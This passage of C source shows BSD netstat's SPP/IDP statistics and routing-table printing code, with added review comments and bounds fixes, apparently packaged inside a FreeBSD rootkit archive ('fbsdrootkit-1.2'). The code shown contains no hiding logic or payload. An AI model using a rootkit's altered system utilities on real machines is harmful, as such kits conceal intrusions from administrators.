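				    sizeof (sppcb)))
					break;
			} else
				continue;
		} else if (isspp)
			continue;
		if (first) {
			printf("Active NS connections");
			if (aflag)
				printf(" (including servers)");
			putchar('\n');
			if (Aflag)
				printf("%-8.8s ", "PCB");
			printf(Aflag ?
			    "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" :
			    "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n",
			    "Proto", "Recv-Q", "Send-Q",
			    "Local Address", "Foreign Address", "(state)");
			first = 0;
		}
		/* ppcb is a u_long, so it needs the l length modifier. */
		if (Aflag)
			printf("%8lx ", ppcb);
		printf("%-5.5s %6d %6d ", name, sockb.so_rcv.sb_cc,
		    sockb.so_snd.sb_cc);
		printf(" %-22.22s", ns_prpr(&nspcb.nsp_laddr));
		printf(" %-22.22s", ns_prpr(&nspcb.nsp_faddr));
		if (isspp) {
			extern char *tcpstates[];
			/*
			 * NOTE(review): only the upper bound is checked
			 * before indexing tcpstates[]; if s_state is a
			 * signed type a negative value read from the kernel
			 * or a core file would index out of bounds --
			 * confirm against the sppcb declaration.
			 */
			if (sppcb.s_state >= TCP_NSTATES)
				printf(" %d", sppcb.s_state);
			else
				printf(" %s", tcpstates[sppcb.s_state]);
		}
		putchar('\n');
		prev = next;
	}
}
#define ANY(x,y,z) \
	((x) ? printf("\t%d %s%s%s -- %s\n",x,y,plural(x),z,"x") : 0)

/*
 * Dump SPP statistics structure.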
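*/
/*
 * off is the kernel address of the spp_istat structure and name the
 * heading to print; each counter is printed only when it is non-zero.
 */
void
spp_stats(off, name)
	u_long off;
	char *name;
{
	struct spp_istat spp_istat;
#define sppstat spp_istat.newstats

	if (off == 0)
		return;
	/*
	 * spp_istat lives on the stack; printing it after a failed read
	 * would report whatever was left there as statistics.
	 */
	if (kread(off, (char *)&spp_istat, sizeof (spp_istat)))
		return;
	printf("%s:\n", name);
	ANY(spp_istat.nonucn, "connection", " dropped due to no new sockets ");
	ANY(spp_istat.gonawy, "connection", " terminated due to our end dying");
	/*
	 * NOTE(review): nonucn is reported a second time here under a
	 * different description -- confirm which counter was intended.
	 */
	ANY(spp_istat.nonucn, "connection", " dropped due to inability to connect");
	ANY(spp_istat.noconn, "connection", " dropped due to inability to connect");
	ANY(spp_istat.notme, "connection", " incompleted due to mismatched id's");
	ANY(spp_istat.wrncon, "connection", " dropped due to mismatched id's");
	ANY(spp_istat.bdreas, "packet", " dropped out of sequence");
	ANY(spp_istat.lstdup, "packet", " duplicating the highest packet");
	ANY(spp_istat.notyet, "packet", " refused as exceeding allocation");
	ANY(sppstat.spps_connattempt, "connection", " initiated");
	ANY(sppstat.spps_accepts, "connection", " accepted");
	ANY(sppstat.spps_connects, "connection", " established");
	ANY(sppstat.spps_drops, "connection", " dropped");
	ANY(sppstat.spps_conndrops, "embryonic connection", " dropped");
	ANY(sppstat.spps_closed, "connection", " closed (includes drops)");
	ANY(sppstat.spps_segstimed, "packet", " where we tried to get rtt");
	ANY(sppstat.spps_rttupdated, "time", " we got rtt");
	ANY(sppstat.spps_delack, "delayed ack", " sent");
	ANY(sppstat.spps_timeoutdrop, "connection", " dropped in rxmt timeout");
	ANY(sppstat.spps_rexmttimeo, "retransmit timeout", "");
	ANY(sppstat.spps_persisttimeo, "persist timeout", "");
	ANY(sppstat.spps_keeptimeo, "keepalive timeout", "");
	ANY(sppstat.spps_keepprobe, "keepalive probe", " sent");
	ANY(sppstat.spps_keepdrops, "connection", " dropped in keepalive");
	ANY(sppstat.spps_sndtotal, "total packet", " sent");
	ANY(sppstat.spps_sndpack, "data packet", " sent");
	ANY(sppstat.spps_sndbyte, "data byte", " sent");
	ANY(sppstat.spps_sndrexmitpack, "data packet", " retransmitted");
	ANY(sppstat.spps_sndrexmitbyte, "data byte", " retransmitted");
	ANY(sppstat.spps_sndacks, "ack-only packet", " sent");
	ANY(sppstat.spps_sndprobe, "window probe", " sent");
	ANY(sppstat.spps_sndurg, "packet", " sent with URG only");
	ANY(sppstat.spps_sndwinup, "window update-only packet", " sent");
	ANY(sppstat.spps_sndctrl, "control (SYN|FIN|RST) packet", " sent");
	ANY(sppstat.spps_sndvoid, "request", " to send a non-existant packet");
	ANY(sppstat.spps_rcvtotal, "total packet", " received");
	ANY(sppstat.spps_rcvpack, "packet", " received in sequence");
	ANY(sppstat.spps_rcvbyte, "byte", " received in sequence");
	ANY(sppstat.spps_rcvbadsum, "packet", " received with ccksum errs");
	ANY(sppstat.spps_rcvbadoff, "packet", " received with bad offset");
	ANY(sppstat.spps_rcvshort, "packet", " received too short");
	ANY(sppstat.spps_rcvduppack, "duplicate-only packet", " received");
	ANY(sppstat.spps_rcvdupbyte, "duplicate-only byte", " received");
	ANY(sppstat.spps_rcvpartduppack, "packet", " with some duplicate data");
	ANY(sppstat.spps_rcvpartdupbyte, "dup. byte", " in part-dup. packet");
	ANY(sppstat.spps_rcvoopack, "out-of-order packet", " received");
	ANY(sppstat.spps_rcvoobyte, "out-of-order byte", " received");
	ANY(sppstat.spps_rcvpackafterwin, "packet", " with data after window");
	ANY(sppstat.spps_rcvbyteafterwin, "byte", " rcvd after window");
	ANY(sppstat.spps_rcvafterclose, "packet", " rcvd after 'close'");
	ANY(sppstat.spps_rcvwinprobe, "rcvd window probe packet", "");
	ANY(sppstat.spps_rcvdupack, "rcvd duplicate ack", "");
	ANY(sppstat.spps_rcvacktoomuch, "rcvd ack", " for unsent data");
	ANY(sppstat.spps_rcvackpack, "rcvd ack packet", "");
	ANY(sppstat.spps_rcvackbyte, "byte", " acked by rcvd acks");
	ANY(sppstat.spps_rcvwinupd, "rcvd window update packet", "");
}
#undef ANY
#define ANY(x,y,z) ((x) ? printf("\t%d %s%s%s\n",x,y,plural(x),z) : 0)

/*
 * Dump IDP statistics structure.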
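*/
/*
 * off is the kernel address of the idpstat structure and name the
 * heading to print; each counter is printed only when it is non-zero.
 */
void
idp_stats(off, name)
	u_long off;
	char *name;
{
	struct idpstat idpstat;

	if (off == 0)
		return;
	/* Do not print an unfilled stack structure as statistics. */
	if (kread(off, (char *)&idpstat, sizeof (idpstat)))
		return;
	printf("%s:\n", name);
	ANY(idpstat.idps_toosmall, "packet", " smaller than a header");
	ANY(idpstat.idps_tooshort, "packet", " smaller than advertised");
	ANY(idpstat.idps_badsum, "packet", " with bad checksums");
}

/* Known XNS error codes; the table ends at the entry whose name is 0. */
static struct {
	u_short code;
	char *name;
	char *where;
} ns_errnames[] = {
	{0, "Unspecified Error", " at Destination"},
	{1, "Bad Checksum", " at Destination"},
	{2, "No Listener", " at Socket"},
	{3, "Packet", " Refused due to lack of space at Destination"},
	{01000, "Unspecified Error", " while gatewayed"},
	{01001, "Bad Checksum", " while gatewayed"},
	{01002, "Packet", " forwarded too many times"},
	{01003, "Packet", " too large to be forwarded"},
	{-1, 0, 0},
};

/*
 * Dump NS Error statistics structure.
 *
 * off is the kernel address of the ns_errstat structure; name is unused.
 */
/*ARGSUSED*/
void
nserr_stats(off, name)
	u_long off;
	char *name;
{
	struct ns_errstat ns_errstat;
	register int j;
	register int histoprint = 1;
	int z;

	if (off == 0)
		return;
	/* Do not print an unfilled stack structure as statistics. */
	if (kread(off, (char *)&ns_errstat, sizeof (ns_errstat)))
		return;
	printf("NS error statistics:\n");
	ANY(ns_errstat.ns_es_error, "call", " to ns_error");
	ANY(ns_errstat.ns_es_oldshort, "error",
	    " ignored due to insufficient addressing");
	ANY(ns_errstat.ns_es_oldns_err, "error request",
	    " in response to error packets");
	ANY(ns_errstat.ns_es_tooshort, "error packet",
	    " received incomplete");
	ANY(ns_errstat.ns_es_badcode, "error packet",
	    " received of unknown type");
	/* The histogram heading is printed once, before the first non-zero bin. */
	for(j = 0; j < NS_ERR_MAX; j ++) {
		z = ns_errstat.ns_es_outhist[j];
		if (z && histoprint) {
			printf("Output Error Histogram:\n");
			histoprint = 0;
		}
		ns_erputil(z, ns_errstat.ns_es_codes[j]);
	}
	histoprint = 1;
	for(j = 0; j < NS_ERR_MAX; j ++) {
		z = ns_errstat.ns_es_inhist[j];
		if (z && histoprint) {
			printf("Input Error Histogram:\n");
			histoprint = 0;
		}
		ns_erputil(z, ns_errstat.ns_es_codes[j]);
	}
}

/*
 * Print one histogram bin: z occurrences of XNS error code c.
 * Codes missing from ns_errnames[] are printed in octal.
 */
static void
ns_erputil(z, c)
	int z, c;
{
	int j;
	/*
	 * The fixed text is 24 characters and an int printed with %o can
	 * take 11 digits, so the original 30-byte buffer could be overrun
	 * by a code value read from kernel memory or a core file.
	 */
	char codebuf[48];
	char *name, *where;

	for(j = 0;; j ++) {
		if ((name = ns_errnames[j].name) == 0)
			break;
		if (ns_errnames[j].code == c)
			break;
	}
	if (name == 0) {
		if (c > 01000)
			where = "in transit";
		else
			where = "at destination";
		(void) snprintf(codebuf, sizeof (codebuf),
		    "Unknown XNS error code 0%o", c);
		name = codebuf;
	} else
		where = ns_errnames[j].where;
	ANY(z, name, where);
}

static struct sockaddr_ns ssns = {AF_NS};

/*
 * Format an ns_addr through ns_print().  The address is copied into the
 * file-static ssns, so the call is not reentrant.
 */
static
char *ns_prpr(x)
	struct ns_addr *x;
{
	struct sockaddr_ns *sns = &ssns;

	sns->sns_addr = *x;
	return(ns_print((struct sockaddr *)sns));
}
fbsdrootkit-1.2/netstat/route.c100600 764 0 41140 6163407273 14460 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED.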
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint #if 0 static char sccsid[] = "From: @(#)route.c 8.6 (Berkeley) 4/28/95"; #endif static const char rcsid[] = "$Id: route.c,v 1.5.4.1 1996/06/24 00:13:50 peter Exp $"; #endif /* not lint */ #include #include #include #include #include #include #include #define KERNEL #include #undef KERNEL #include #include #include #include #include #include #include #include #include #include #include "netstat.h" #define kget(p, d) (kread((u_long)(p), (char *)&(d), sizeof (d))) /* * Definitions for showing gateway flags. 
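*/
struct bits {
	u_long	b_mask;
	char	b_val;
} bits[] = {
	{ RTF_UP,	'U' },
	{ RTF_GATEWAY,	'G' },
	{ RTF_HOST,	'H' },
	{ RTF_REJECT,	'R' },
	{ RTF_DYNAMIC,	'D' },
	{ RTF_MODIFIED,	'M' },
	{ RTF_DONE,	'd' }, /* Completed -- for routing messages only */
	{ RTF_MASK,	'm' }, /* Mask Present -- for routing messages only */
	{ RTF_CLONING,	'C' },
	{ RTF_XRESOLVE,	'X' },
	{ RTF_LLINFO,	'L' },
	{ RTF_STATIC,	'S' },
	{ RTF_PROTO1,	'1' },
	{ RTF_PROTO2,	'2' },
	{ RTF_WASCLONED,'W' },
	{ RTF_PRCLONING,'c' },
	{ RTF_PROTO3,	'3' },
	{ RTF_BLACKHOLE,'B' },
	{ 0 }
};

/* Scratch space for one sockaddr copied out of the kernel by kgetsa(). */
static union {
	struct	sockaddr u_sa;
	u_short	u_data[128];
} pt_u;

int	do_rtent = 0;
struct	rtentry rtentry;
struct	radix_node rnode;
struct	radix_mask rmask;
struct	radix_node_head *rt_tables[AF_MAX+1];

int	NewTree = 0;

static struct sockaddr *kgetsa __P((struct sockaddr *));
static void p_tree __P((struct radix_node *));
static void p_rtnode __P(());
static void ntreestuff __P(());
static void np_rtentry __P((struct rt_msghdr *));
static void p_sockaddr __P((struct sockaddr *, struct sockaddr *, int, int));
static void p_flags __P((int, char *));
static void p_rtentry __P((struct rtentry *));

/*
 * Print routing tables.
 *
 * rtree is the kernel address of the rt_tables array.  With NewTree set
 * and Aflag clear the table is printed by ntreestuff() instead and rtree
 * is not used.
 */
void
routepr(rtree)
	u_long rtree;
{
	struct radix_node_head *rnh, head;
	int i;

	printf("Routing tables\n");

	if (Aflag == 0 && NewTree) {
		ntreestuff();
		return;
	}

	if (rtree == 0) {
		printf("rt_tables: symbol not in namelist\n");
		return;
	}

	/* kget() yields kread()'s result: non-zero means the read failed. */
	if (kget(rtree, rt_tables))
		return;
	for (i = 0; i <= AF_MAX; i++) {
		if ((rnh = rt_tables[i]) == 0)
			continue;
		/*
		 * head is a stack object; after a failed read its treetop
		 * pointer is meaningless, so skip this family rather than
		 * hand it to p_tree().
		 */
		if (kget(rnh, head))
			continue;
		if (i == AF_UNSPEC) {
			if (Aflag && af == 0) {
				printf("Netmasks:\n");
				p_tree(head.rnh_treetop);
			}
		} else if (af == AF_UNSPEC || af == i) {
			pr_family(i);
			do_rtent = 1;
			pr_rthdr();
			p_tree(head.rnh_treetop);
		}
	}
}

/*
 * Print address family header before a section of the routing table.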
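*/
/*
 * pr_family -- print a section banner for address family `af'.
 * Families without a name in the switch below are printed numerically.
 */
void
pr_family(af)
	int af;
{
	char *afname;

	switch (af) {
	case AF_INET:
		afname = "Internet";
		break;
	case AF_NS:
		afname = "XNS";
		break;
	case AF_ISO:
		afname = "ISO";
		break;
	case AF_CCITT:
		afname = "X.25";
		break;
	default:
		afname = NULL;
		break;
	}
	if (afname)
		printf("\n%s:\n", afname);
	else
		printf("\nProtocol Family %d:\n", af);
}

/* column widths; each followed by one space */
#define WID_DST 18 /* width of destination column */
#define WID_GW 18 /* width of gateway column */

/*
 * Print header for routing table columns.
 */
void
pr_rthdr()
{
	if (Aflag)
		printf("%-8.8s ","Address");
	printf("%-*.*s %-*.*s %-6.6s %6.6s%8.8s %8.8s %6s\n",
	    WID_DST, WID_DST, "Destination",
	    WID_GW, WID_GW, "Gateway",
	    "Flags", "Refs", "Use", "Netif", "Expire");
}

/*
 * kgetsa -- copy the sockaddr at kernel address `dst' into the shared
 * pt_u buffer and return a pointer to it.  When sa_len says the address
 * is longer than a plain struct sockaddr, the whole thing is re-read
 * into pt_u.u_data.
 * NOTE(review): pt_u is declared outside this excerpt; this assumes
 * u_data can hold the largest sa_len (255) -- confirm.
 */
static struct sockaddr *
kgetsa(dst)
	register struct sockaddr *dst;
{
	kget(dst, pt_u.u_sa);
	if (pt_u.u_sa.sa_len > sizeof (pt_u.u_sa))
		kread((u_long)dst, (char *)pt_u.u_data, pt_u.u_sa.sa_len);
	return (&pt_u.u_sa);
}

/*
 * p_tree -- walk the radix tree rooted at kernel address `rn'.
 * Leaves (rn_b < 0) are printed, following the rn_dupedkey chain with
 * the `again' loop; internal nodes recurse left, then right.
 */
static void
p_tree(rn)
	struct radix_node *rn;
{
again:
	kget(rn, rnode);
	if (rnode.rn_b < 0) {
		if (Aflag)
			printf("%-8.8x ", rn);
		if (rnode.rn_flags & RNF_ROOT) {
			if (Aflag)
				printf("(root node)%s",
				    rnode.rn_dupedkey ? " =>\n" : "\n");
		} else if (do_rtent) {
			kget(rn, rtentry);
			p_rtentry(&rtentry);
			if (Aflag)
				p_rtnode();
		} else {
			p_sockaddr(kgetsa((struct sockaddr *)rnode.rn_key),
			    NULL, 0, 44);
			putchar('\n');
		}
		if (rn = rnode.rn_dupedkey)
			goto again;
	} else {
		if (Aflag && do_rtent) {
			printf("%-8.8x ", rn);
			p_rtnode();
		}
		/* rnode is a shared global: save rn_r before recursing */
		rn = rnode.rn_r;
		p_tree(rnode.rn_l);
		p_tree(rn);
	}
}

char nbuf[20];

/*
 * p_rtnode -- print the mask information of the node currently held
 * in the global `rnode', then its rn_mklist chain.
 */
static void
p_rtnode()
{
	struct radix_mask *rm = rnode.rn_mklist;

	if (rnode.rn_b < 0) {
		if (rnode.rn_mask) {
			printf("\t mask ");
			p_sockaddr(kgetsa((struct sockaddr *)rnode.rn_mask),
			    NULL, 0, -1);
		} else if (rm == 0)
			return;
	} else {
		sprintf(nbuf, "(%d)", rnode.rn_b);
		printf("%6.6s %8.8x : %8.8x", nbuf, rnode.rn_l, rnode.rn_r);
	}
	while (rm) {
		kget(rm, rmask);
		sprintf(nbuf, " %d refs, ", rmask.rm_refs);
		printf(" mk = %8.8x {(%d),%s",
		    rm, -1 - rmask.rm_b, rmask.rm_refs ? nbuf : " ");
		if (rmask.rm_flags & RNF_NORMAL) {
			struct radix_node rnode_aux;

			printf(" , ");
			kget(rmask.rm_leaf, rnode_aux);
			p_sockaddr(kgetsa((struct sockaddr *)rnode_aux.rn_mask),
			    NULL, 0, -1);
		} else
			p_sockaddr(kgetsa((struct sockaddr *)rmask.rm_mask),
			    NULL, 0, -1);
		putchar('}');
		if (rm = rmask.rm_mklist)
			printf(" ->");
	}
	putchar('\n');
}

/*
 * ntreestuff -- fetch the routing table with the NET_RT_DUMP sysctl
 * and print every message in it through np_rtentry().
 */
static void
ntreestuff()
{
	size_t needed;
	int mib[6];
	char *buf, *next, *lim;
	register struct rt_msghdr *rtm;

	mib[0] = CTL_NET;
	mib[1] = PF_ROUTE;
	mib[2] = 0;
	mib[3] = 0;
	mib[4] = NET_RT_DUMP;
	mib[5] = 0;
	if (sysctl(mib, 6, NULL, &needed, NULL, 0) < 0) {
		err(1, "sysctl: net.route.0.0.dump estimate");
	}

	if ((buf = malloc(needed)) == 0) {
		err(2, "malloc(%lu)", (unsigned long)needed);
	}
	if (sysctl(mib, 6, buf, &needed, NULL, 0) < 0) {
		err(1, "sysctl: net.route.0.0.dump");
	}
	lim = buf + needed;
	for (next = buf; next < lim; next += rtm->rtm_msglen) {
		/* a truncated header must not be read past the buffer */
		if ((size_t)(lim - next) < sizeof(*rtm))
			break;
		rtm = (struct rt_msghdr *)next;
		/* a zero length would never advance `next' */
		if (rtm->rtm_msglen == 0)
			break;
		np_rtentry(rtm);
	}
	free(buf);
}

/*
 * np_rtentry -- print one routing message: destination, gateway (when
 * the message carries more than RTA_DST) and the interesting flags.
 * A family banner is printed whenever the address family changes.
 */
static void
np_rtentry(rtm)
	register struct rt_msghdr *rtm;
{
	register struct sockaddr *sa = (struct sockaddr *)(rtm + 1);
#ifdef notdef
	static int masks_done, banner_printed;
#endif
	static int old_af;
	int af = 0, interesting = RTF_UP | RTF_GATEWAY | RTF_HOST;

#ifdef notdef
	/* for the moment, netmasks are skipped over */
	if (!banner_printed) {
		printf("Netmasks:\n");
		banner_printed = 1;
	}
	if (masks_done == 0) {
		if (rtm->rtm_addrs != RTA_DST ) {
			masks_done = 1;
			af = sa->sa_family;
		}
	} else
#endif
		af = sa->sa_family;
	if (af != old_af) {
		pr_family(af);
		old_af = af;
	}
	if (rtm->rtm_addrs == RTA_DST)
		p_sockaddr(sa, NULL, 0, 36);
	else {
		p_sockaddr(sa, NULL, rtm->rtm_flags, 16);
		if (sa->sa_len == 0)
			sa->sa_len = sizeof(long);
		sa = (struct sockaddr *)(sa->sa_len + (char *)sa);
		p_sockaddr(sa, NULL, 0, 18);
	}
	p_flags(rtm->rtm_flags & interesting, "%-6.6s ");
	putchar('\n');
}

/*
 * p_sockaddr -- format `sa' according to its family and print it.
 * `mask' (may be NULL) and `flags' select host/net naming for AF_INET;
 * a negative `width' prints the text unpadded, otherwise it is padded
 * (and, without -n, truncated) to `width' columns.
 *
 * The address bytes come from kernel memory or a core file, so every
 * write into workbuf is bounded here rather than trusted.
 */
static void
p_sockaddr(sa, mask, flags, width)
	struct sockaddr *sa, *mask;
	int flags, width;
{
	char workbuf[128], *cplim;
	register char *cp = workbuf;

	/* never print an unwritten buffer (e.g. IFT_ETHER with sdl_alen 0) */
	workbuf[0] = '\0';

	switch(sa->sa_family) {
	case AF_INET:
	    {
		register struct sockaddr_in *sin = (struct sockaddr_in *)sa;

		if (sin->sin_addr.s_addr == INADDR_ANY)
			cp = "default";
		else if (flags & RTF_HOST)
			cp = routename(sin->sin_addr.s_addr);
		else if (mask)
			cp = netname(sin->sin_addr.s_addr,
			    ntohl(((struct sockaddr_in *)mask)
			    ->sin_addr.s_addr));
		else
			cp = netname(sin->sin_addr.s_addr, 0L);
		break;
	    }

	case AF_NS:
		cp = ns_print(sa);
		break;

	case AF_LINK:
	    {
		register struct sockaddr_dl *sdl = (struct sockaddr_dl *)sa;

		if (sdl->sdl_nlen == 0 && sdl->sdl_alen == 0 &&
		    sdl->sdl_slen == 0)
			(void) sprintf(workbuf, "link#%d", sdl->sdl_index);
		else switch (sdl->sdl_type) {
		case IFT_ETHER:
		    {
			register int i;
			register u_char *lla = (u_char *)sdl->sdl_data +
			    sdl->sdl_nlen;

			cplim = "";
			for (i = 0; i < sdl->sdl_alen; i++, lla++) {
				/*
				 * Each byte adds at most ":ff" plus the
				 * terminating NUL; stop before an oversized
				 * sdl_alen can run off the end of workbuf.
				 */
				if (cp + 4 > workbuf + sizeof(workbuf))
					break;
				cp += sprintf(cp, "%s%x", cplim, *lla);
				cplim = ":";
			}
			cp = workbuf;
			break;
		    }
		default:
			cp = link_ntoa(sdl);
			break;
		}
		break;
	    }

	default:
	    {
		register u_char *s = (u_char *)sa->sa_data, *slim;

		slim = sa->sa_len + (u_char *) sa;
		/* leave room for one " xxxx" group and the NUL */
		cplim = cp + sizeof(workbuf) - 6;
		cp += sprintf(cp, "(%d)", sa->sa_family);
		while (s < slim && cp < cplim) {
			cp += sprintf(cp, " %02x", *s++);
			if (s < slim)
				cp += sprintf(cp, "%02x", *s++);
		}
		cp = workbuf;
	    }
	}
	if (width < 0 )
		printf("%s ", cp);
	else {
		if (nflag)
			printf("%-*s ", width, cp);
		else
			printf("%-*.*s ", width, width, cp);
	}
}

/*
 * p_flags -- translate the bits set in `f' to their one-letter names
 * (from the `bits' table) and print them with `format'.
 */
static void
p_flags(f, format)
	register int f;
	char *format;
{
	char name[33], *flags;
	register struct bits *p = bits;

	for (flags = name; p->b_mask; p++)
		/* keep one byte for the NUL whatever the table size */
		if ((p->b_mask & f) && flags < name + sizeof(name) - 1)
			*flags++ = p->b_val;
	*flags = '\0';
	printf(format, name);
}

/*
 * p_rtentry -- print one routing table entry: destination, gateway,
 * flags, reference and use counts, interface name and expiry.
 */
static void
p_rtentry(rt)
	register struct rtentry *rt;
{
	static struct ifnet ifnet, *lastif;
	static char name[16];
	static char prettyname[9];
	struct sockaddr *sa;
	struct sockaddr addr, mask;

	/*
	 * Don't print protocol-cloned routes unless -a.
	 */
	if(rt->rt_parent && !aflag)
		return;

	if (!(sa = kgetsa(rt_key(rt))))
		bzero(&addr, sizeof addr);
	else
		addr = *sa;
	if (!rt_mask(rt) || !(sa = kgetsa(rt_mask(rt))))
		bzero(&mask, sizeof mask);
	else
		mask = *sa;
	p_sockaddr(&addr, &mask, rt->rt_flags, WID_DST);
	p_sockaddr(kgetsa(rt->rt_gateway), NULL, RTF_HOST, WID_GW);
	p_flags(rt->rt_flags, "%-6.6s ");
	printf("%6d %8d ", rt->rt_refcnt, rt->rt_use);
	if (rt->rt_ifp) {
		/* the interface name is cached across consecutive entries */
		if (rt->rt_ifp != lastif) {
			kget(rt->rt_ifp, ifnet);
			kread((u_long)ifnet.if_name, name, 16);
			lastif = rt->rt_ifp;
			/* "%.6s" bounds the read: name[] may lack a NUL */
			snprintf(prettyname, sizeof prettyname,
			    "%.6s%d", name, ifnet.if_unit);
		}
		if(rt->rt_rmx.rmx_expire) {
			time_t expire_time;

			if ((expire_time
			    =rt->rt_rmx.rmx_expire - time((time_t *)0)) > 0)
				printf(" %8.8s %6d%s", prettyname,
				    expire_time,
				    rt->rt_nodes[0].rn_dupedkey ? " =>" : "");
		} else {
			printf(" %8.8s%s", prettyname,
			    rt->rt_nodes[0].rn_dupedkey ? " =>" : "");
		}
	}
	putchar('\n');
}

/*
 * routename -- return the host name for address `in' (network byte
 * order), or its dotted quad when -n is set or the lookup fails.
 * The result lives in a static buffer overwritten by the next call.
 */
char *
routename(in)
	u_long in;
{
	register char *cp;
	static char line[MAXHOSTNAMELEN + 1];
	struct hostent *hp;

	cp = 0;
	if (!nflag) {
		hp = gethostbyaddr((char *)&in, sizeof (struct in_addr),
		    AF_INET);
		if (hp) {
			cp = hp->h_name;
			trimdomain(cp);
		}
	}
	if (cp)
		strncpy(line, cp, sizeof(line) - 1);
	else {
#define C(x) ((x) & 0xff)
		in = ntohl(in);
		sprintf(line, "%u.%u.%u.%u",
		    C(in >> 24), C(in >> 16), C(in >> 8), C(in));
	}
	return (line);
}

/*
 * forgemask -- return the classful (A/B/C) network mask for `a'.
 */
static u_long
forgemask(a)
	u_long a;
{
	u_long m;

	if (IN_CLASSA(a))
		m = IN_CLASSA_NET;
	else if (IN_CLASSB(a))
		m = IN_CLASSB_NET;
	else
		m = IN_CLASSC_NET;
	return (m);
}

/*
 * domask -- write a mask suffix for `mask' at `dst': nothing when the
 * mask is zero or the classful default for `addr', "/bits" for a
 * contiguous mask, "&0xmask" otherwise.  `dst' has no size argument;
 * the caller must leave room for the suffix.
 */
static void
domask(dst, addr, mask)
	char *dst;
	u_long addr, mask;
{
	register int b, i;

	if (!mask || (forgemask(addr) == mask)) {
		*dst = '\0';
		return;
	}
	i = 0;
	/* unsigned constant: 1 << 31 overflows a signed int */
	for (b = 0; b < 32; b++)
		if (mask & (1UL << b)) {
			register int bb;

			i = b;
			for (bb = b+1; bb < 32; bb++)
				if (!(mask & (1UL << bb))) {
					i = -1; /* noncontig */
					break;
				}
			break;
		}
	if (i == -1)
		sprintf(dst, "&0x%lx", mask);
	else
		sprintf(dst, "/%d", 32-i);
}

/* room kept at the end of netname()'s buffer for domask()'s suffix */
#define NETNAME_MASKROOM 20

/*
 * Return the name of the network whose address is given.
 * The address is assumed to be that of a net or subnet, not a host.
 */
char *
netname(in, mask)
	u_long in, mask;
{
	char *cp = 0;
	static char line[MAXHOSTNAMELEN + 1];
	struct netent *np = 0;
	u_long net, omask;
	register u_long i;
	int subnetshift;

	i = ntohl(in);
	omask = mask;
	if (!nflag && i) {
		if (mask == 0) {
			switch (mask = forgemask(i)) {
			case IN_CLASSA_NET:
				subnetshift = 8;
				break;
			case IN_CLASSB_NET:
				subnetshift = 8;
				break;
			case IN_CLASSC_NET:
				subnetshift = 4;
				break;
			default:
				abort();
			}
			/*
			 * If there are more bits than the standard mask
			 * would suggest, subnets must be in use.
			 * Guess at the subnet mask, assuming reasonable
			 * width subnet fields.
			 */
			while (i &~ mask)
				mask = (long)mask >> subnetshift;
		}
		net = i & mask;
		while ((mask & 1) == 0)
			mask >>= 1, net >>= 1;
		if (!(np = getnetbyaddr(i, AF_INET)))
			np = getnetbyaddr(net, AF_INET);
		if (np) {
			cp = np->n_name;
			trimdomain(cp);
		}
	}
	if (cp) {
		/*
		 * Truncate over-long names so that domask() below cannot
		 * write past the end of line[], and terminate explicitly:
		 * a suffix left by an earlier call may follow the copy.
		 */
		strncpy(line, cp, sizeof(line) - 1 - NETNAME_MASKROOM);
		line[sizeof(line) - 1 - NETNAME_MASKROOM] = '\0';
	} else if ((i & 0xffffff) == 0)
		sprintf(line, "%u", C(i >> 24));
	else if ((i & 0xffff) == 0)
		sprintf(line, "%u.%u", C(i >> 24) , C(i >> 16));
	else if ((i & 0xff) == 0)
		sprintf(line, "%u.%u.%u", C(i >> 24), C(i >> 16), C(i >> 8));
	else
		sprintf(line, "%u.%u.%u.%u", C(i >> 24),
		    C(i >> 16), C(i >> 8), C(i));
	domask(line+strlen(line), i, omask);
	return (line);
}

/*
 * Print routing statistics
 */
void
rt_stats(off)
	u_long off;
{
	struct rtstat rtstat;

	if (off == 0) {
		printf("rtstat: symbol not in namelist\n");
		return;
	}
	/* on a failed read rtstat would be printed uninitialized */
	if (kread(off, (char *)&rtstat, sizeof (rtstat)))
		return;
	printf("routing:\n");
	printf("\t%u bad routing redirect%s\n",
	    rtstat.rts_badredirect, plural(rtstat.rts_badredirect));
	printf("\t%u dynamically created route%s\n",
	    rtstat.rts_dynamic, plural(rtstat.rts_dynamic));
	printf("\t%u new gateway%s due to redirects\n",
	    rtstat.rts_newgateway, plural(rtstat.rts_newgateway));
	printf("\t%u destination%s found unreachable\n",
	    rtstat.rts_unreach, plural(rtstat.rts_unreach));
	printf("\t%u use%s of a wildcard route\n",
	    rtstat.rts_wildcard, plural(rtstat.rts_wildcard));
}

short ns_nullh[] = {0,0,0};
short ns_bh[] = {-1,-1,-1};

/*
 * ns_print -- format an XNS address as net.host.port in upper-case
 * hex with an 'H' suffix; "*" stands for an all-zero part and "any"
 * for the all-ones host.  Returns a static buffer.
 */
char *
ns_print(sa)
	register struct sockaddr *sa;
{
	register struct sockaddr_ns *sns = (struct sockaddr_ns*)sa;
	struct ns_addr work;
	union { union ns_net net_e; u_long long_e; } net;
	u_short port;
	static char mybuf[50], cport[10], chost[25];
	char *host = "";
	register char *p;
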